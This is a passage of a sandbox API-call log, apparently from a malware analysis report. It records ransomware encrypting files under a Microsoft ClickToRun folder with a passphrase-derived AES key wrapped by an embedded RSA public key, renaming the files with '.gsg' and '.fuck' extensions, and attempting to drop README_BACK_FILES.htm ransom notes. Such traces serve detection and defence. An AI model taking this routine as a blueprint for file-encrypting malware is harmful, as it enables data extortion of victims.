pcbStructInfo=0x2b9d91c) returned 1 [0234.813] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x27919a0) returned 1 [0234.816] CryptImportPublicKeyInfo (in: hCryptProv=0x27919a0, dwCertEncodingType=0x1, pInfo=0x27963a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27963d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27963e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27174a8) returned 1 [0234.817] CryptEncrypt (in: hKey=0x27174a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.817] CryptEncrypt (in: hKey=0x27174a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2791bc0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2791bc0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.817] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2791bc0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.817] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.817] CryptEncrypt (in: hKey=0x2716fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.817] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.817] CloseHandle (hObject=0xffffffff) returned 1 [0234.817] CloseHandle (hObject=0xffffffff) returned 1 [0234.817] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml"), bFailIfExists=0) returned 0 [0234.818] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x0) returned 0 [0234.818] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml.gsg")) returned 0 [0234.818] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\MasterDescriptor.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\masterdescriptor.x-none.xml.fuck")) returned 0 [0234.819] CryptDestroyHash (hHash=0x27170a8) returned 1 [0234.819] CryptDestroyKey (hKey=0x2716fe8) returned 1 [0234.819] CryptReleaseContext (hProv=0x2791cd0, dwFlags=0x0) returned 1 [0234.819] FindNextFileA (in: hFindFile=0x27176a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.819] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.819] GetLastError () returned 0x5 [0234.819] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash")) returned 0x20 [0234.820] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash", dwFileAttributes=0x80) returned 0 [0234.820] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.820] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.821] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.gsg", dwFileAttributes=0x2) returned 0 [0234.821] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2793100) returned 1 [0234.832] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.832] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.832] CryptHashData (hHash=0x2716fa8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.832] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x2716fa8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27173a8) returned 1 [0234.832] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.832] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.832] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x27922a8) returned 1 [0234.835] CryptImportPublicKeyInfo (in: hCryptProv=0x27922a8, dwCertEncodingType=0x1, pInfo=0x2797248*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797278*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797280*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2716fe8) returned 1 [0234.835] CryptEncrypt (in: hKey=0x2716fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.835] CryptEncrypt (in: hKey=0x2716fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2791d58*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2791d58*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.835] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2791d58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.835] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.835] CryptEncrypt (in: hKey=0x27173a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.835] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.836] CloseHandle (hObject=0xffffffff) returned 1 [0234.836] CloseHandle (hObject=0xffffffff) returned 1 [0234.836] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash"), bFailIfExists=0) returned 0 [0234.836] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash", dwFileAttributes=0x0) returned 0 [0234.836] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash.gsg")) returned 0 [0234.837] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\s640.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\s640.hash.fuck")) returned 0 [0234.837] CryptDestroyHash (hHash=0x2716fa8) returned 1 [0234.837] CryptDestroyKey (hKey=0x27173a8) returned 1 [0234.837] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.837] FindNextFileA (in: hFindFile=0x27176a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.837] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.837] GetLastError () returned 0x5 [0234.837] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat")) returned 0x20 [0234.840] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x80) returned 0 [0234.841] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.841] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.842] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0234.842] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2792198) returned 1 [0234.849] CryptCreateHash (in: hProv=0x2792198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.849] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.849] CryptHashData (hHash=0x27173a8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.849] CryptDeriveKey (in: hProv=0x2792198, Algid=0x6610, hBaseData=0x27173a8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27170a8) returned 1 [0234.849] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.849] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.850] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2791808) returned 1 [0234.852] CryptImportPublicKeyInfo (in: hCryptProv=0x2791808, dwCertEncodingType=0x1, pInfo=0x2796478*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27964a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27964b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x3949a8) returned 1 [0234.852] CryptEncrypt (in: hKey=0x3949a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.852] CryptEncrypt (in: hKey=0x3949a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792088*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2792088*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.852] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792088, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.852] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.852] CryptEncrypt (in: hKey=0x27170a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.852] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.852] CloseHandle (hObject=0xffffffff) returned 1 [0234.852] CloseHandle (hObject=0xffffffff) returned 1 [0234.852] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat"), bFailIfExists=0) returned 0 [0234.853] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x0) returned 0 [0234.853] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat.gsg")) returned 0 [0234.853] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\stream.x64.x-none.man.dat.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\stream.x64.x-none.man.dat.fuck")) returned 0 [0234.853] CryptDestroyHash (hHash=0x27173a8) returned 1 [0234.853] CryptDestroyKey (hKey=0x27170a8) returned 1 [0234.853] CryptReleaseContext (hProv=0x2792198, dwFlags=0x0) returned 1 [0234.853] FindNextFileA (in: hFindFile=0x27176a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0234.853] FindClose (in: hFindFile=0x27176a8 | out: hFindFile=0x27176a8) returned 1 [0234.854] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\readme_back_files.htm")) returned 0xffffffff [0234.854] AreFileApisANSI () returned 1 [0234.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0234.854] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.854] GetLastError () returned 0x5 [0234.854] GetLastError () returned 0x5 [0234.854] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0234.854] FindClose (in: hFindFile=0x27175e8 | out: hFindFile=0x27175e8) returned 1 [0234.854] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\readme_back_files.htm")) returned 0xffffffff [0234.854] AreFileApisANSI () returned 1 [0234.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39da88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0234.854] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.855] GetLastError () returned 0x5 [0234.855] GetLastError () returned 0x5 [0234.855] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.855] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0234.855] GetLastError () returned 0x5 [0234.855] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml")) returned 0x20 [0234.855] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", dwFileAttributes=0x80) returned 0 [0234.857] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.858] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.858] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.858] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2793100) returned 1 [0234.866] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0234.866] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.866] CryptHashData (hHash=0x394b28, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.866] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x394b28, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x394be8) returned 1 [0234.866] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.866] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0234.866] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2792330) returned 1 [0234.868] CryptImportPublicKeyInfo (in: hCryptProv=0x2792330, dwCertEncodingType=0x1, pInfo=0x2796548*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796578*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796580*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x394a68) returned 1 [0234.868] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0234.868] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27924c8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x27924c8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0234.868] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27924c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0234.869] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a008, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x275a008, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0234.869] CryptEncrypt (in: hKey=0x394be8, 